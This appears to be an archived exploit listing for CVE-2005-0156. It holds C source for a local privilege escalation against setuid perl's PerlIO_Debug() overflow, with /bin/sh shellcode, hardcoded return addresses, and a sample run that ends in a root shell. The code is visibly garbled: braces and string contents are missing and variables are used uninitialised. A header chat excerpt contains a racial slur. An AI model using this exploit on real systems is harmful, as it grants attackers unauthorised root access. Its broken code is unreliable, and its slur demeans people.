Setuid perl - 'PerlIO_Debug()' Local Overflow

Related Vulnerabilities: CVE-2005-0156  
Publish Date: 07 Feb 2005
 * Copyright Kevin Finisterre
 * Setuid perl PerlIO_Debug() overflow
 * Tested on Debian 3.1 perl-suid 5.8.4-5 
 * (11:07:20) *corezion:* who is tha man with tha masta plan?
 * (11:07:36) *corezion:* a nigga with a buffer overrun
 * (11:07:39) *corezion:* heh
 * (of course that is to the tune of
 * cc -o ex_perl2 ex_perl2.c -std=c99
 * kfinisterre@jdam:~$ ./ex_perl2
 * Dirlen: 1052
 * Charlie Murphy!!!@#@
 * sh-2.05b# id
 * uid=1000(kfinisterre) gid=1000(kfinisterre) euid=0(root) 

#include <stdlib.h>
#include <stdio.h>
#include <strings.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

int main(int *argc, char **argv)
	int len = 23;
 	int count = 5;
	char malpath[10000];
	char tmp[256];
	char *filler;
	char *ptr;

	unsigned char code[] = 
	  0xff-less execve() /bin/sh by anathema <>
	  Linux/IA32 0xff-less execve() shellcode.  

        // setuid(0) - fix for redhat based machines
	"\x31\xdb"                      // xorl         %ebx,%ebx
	"\x8d\x43\x17"                  // leal         0x17(%ebx),%eax
	"\xcd\x80"                      // int          $0x80

	"\x89\xe6"                          /* movl %esp, %esi          */
	"\x83\xc6\x30"                      /* addl $0x30, %esi         */
	"\xb8\x2e\x62\x69\x6e"              /* movl $0x6e69622e, %eax   */
	"\x40"                              /* incl %eax                */
	"\x89\x06"                          /* movl %eax, (%esi)        */
	"\xb8\x2e\x73\x68\x21"              /* movl $0x2168732e, %eax   */
	"\x40"                              /* incl %eax                */
	"\x89\x46\x04"                      /* movl %eax, 0x04(%esi)    */
	"\x29\xc0"                          /* subl %eax, %eax          */
	"\x88\x46\x07"                      /* movb %al, 0x07(%esi)     */
	"\x89\x76\x08"                      /* movl %esi, 0x08(%esi)    */
	"\x89\x46\x0c"                      /* movl %eax, 0x0c(%esi)    */
	"\xb0\x0b"                          /* movb $0x0b, %al          */
	"\x87\xf3"                          /* xchgl %esi, %ebx         */
	"\x8d\x4b\x08"                      /* leal 0x08(%ebx), %ecx    */
	"\x8d\x53\x0c"                      /* leal 0x0c(%ebx), %edx    */
	"\xcd\x80"                          /* int $0x80                */;


	// do one less char than usual for RedHat 
	for (int x=0; x<4; x=x+1)
		mkdir(filler, 0777);
		// do one less char than usual for RedHat 
		count = count + 255;		

	count = count + len;

        ptr = tmp+len;
        ptr = putLong (ptr, 0xbffffb6a); // frame 11 ebp
        ptr = putLong (ptr, 0xbffffb6a); 
        ptr = putLong (ptr, 0xbffffb6a);

	strcat(tmp, "/");
	mkdir(tmp, 0777);

	printf ("Dirlen: %d\n", count); 

	FILE *perlsploit;
	char perldummyfile[] = {
                "# \n"
                "# Be proud that perl(1) may proclaim: \n"
                "#   Setuid Perl scripts are safer than C programs ...\n"
                "# Do not abandon (deprecate) suidperl. Do not advocate C wrappers. \n"

        if(!(perlsploit = fopen("","w+"))) {
                printf("error opening file\n");

	getcwd(malpath, 10000);
	strcat(malpath, "/");
	strcat(malpath, "");
	printf("Charlie Murphy!!!@#@\n");

        setenv("PERLIO_DEBUG", "/tmp/ninjitsu", 1);
	setenv("PERL5LIB", code, 1);
	execv(malpath,(char *) NULL);

 * put a address in mem, for little-endian
putLong (char* ptr, long value)
    *ptr++ = (char) (value >> 0) & 0xff;
    *ptr++ = (char) (value >> 8) & 0xff;
    *ptr++ = (char) (value >> 16) & 0xff;
    *ptr++ = (char) (value >> 24) & 0xff;

    return ptr;

// [2005-02-07]